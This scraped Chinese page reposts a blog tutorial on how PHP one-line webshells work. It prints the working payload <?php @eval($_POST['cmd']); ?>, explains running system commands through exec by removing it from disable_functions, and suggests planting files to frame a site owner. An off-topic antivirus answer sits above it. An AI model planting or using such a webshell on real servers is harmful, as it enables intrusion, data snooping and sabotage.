如何使用JSP一句话木马和菜刀木马

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何使用JSP一句话木马和菜刀木马相关的知识,希望对你有一定的参考价值。

参考技术A 建议您不要使用一句话木马,一句话木马会对您的电脑造成损害的,如果您曾使用过此类不安全的一句话木马的话,为了您电脑的安全,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀本回答被提问者和网友采纳

一句话木马(webshell)是如何执行命令的

     

在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。


首先我们先看一个原始而又简单的php一句话木马。

<?php @eval($_POST[‘cmd‘]); ?>

看到这里不得不赞美前辈的智慧。


对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一眼就是密码是cmd,通过post提交数据,但是具体如何执行的,却不得而知,下面我们分析一句话是如何执行的。


这句话什么意思呢?

php的代码要写在<?php  ?>里面,服务器才能认出来这是php代码,然后才去解析。

@符号的意思是不报错。

例如:

如果没有@,如下图,就会报错

技术分享


为什么呢?

因为一个变量没有定义,就被拿去使用了,

服务器就善意的提醒:Notice,你的xxx变量没有定义。

这不就暴露了密码吗?

所以加上@

为什么pw是密码呢?


那就要来理解这句话的意思了

php里面几个超全局变量

$_GET、$_POST就是其中之一

$_POST[‘a‘];

意思就是a这个变量,用post的方法接收。

(传输数据的两种方法,get、post,post是在消息体存放数据,get是在消息头的url路径里存放数据(例如xxx.php?a=2))

eval()

把字符串作为PHP代码执行

例如:eval("echo ‘a‘");其实就等于直接 echo ‘a‘;

再来看看<?php eval($_POST[‘pw‘]); ?>

首先,用post方式接收变量pw,比如接收到了:pw=echo ‘a‘;

这时代码就变成<?php eval("echo ‘a‘;"); ?>

结果:

技术分享


连起来意思就是:

用post方法接收变量pw,把变量pw里面的字符串当做php代码来执行

所以也就能这么玩:


也就是说,你想执行什么代码,就把什么代码放进变量pw里,用post传输给一句话木马

你想查看目标硬盘里有没有小黄片,可以用php函数:opendir()和readdir()等等

想上传点小黄片,诬陷站主,就用php函数:move_uploaded_file,当然相应的html要写好

你想执行cmd命令,则用exec()

当然前提是:

php配置文件php.ini里,关掉安全模式safe_mode = off,

然后在看看 禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ,把exec去掉,确保没有exec。

(有些cms为了方便处理某些功能,会去掉的)

看看效果:

技术分享


现在应该理解,为什么说一句话短小精悍了吧!


我们在看一下一句话在菜刀之类的webshell管理工具里面是如何一句话是如何执行的

技术分享


其实可以很明显看明白,其实执行的命令就和我们前面写的哪样进行输入输出,执行系统命令操作。

所以只要webshell有足够高的权限,可以做任何你想做的事情。


本文出自 “tar0cisp” 博客,请务必保留此出处http://tar0cisp.blog.51cto.com/6253667/1937364

以上是关于如何使用JSP一句话木马和菜刀木马的主要内容,如果未能解决你的问题,请参考以下文章

中国菜刀与一句话木马

一句话木马:初识木马练习

jsp木马删除后还在

过狗菜刀原理以及绕过魔术引号的配置

一句话木马简介

文件上传——不为人知的木马上传大法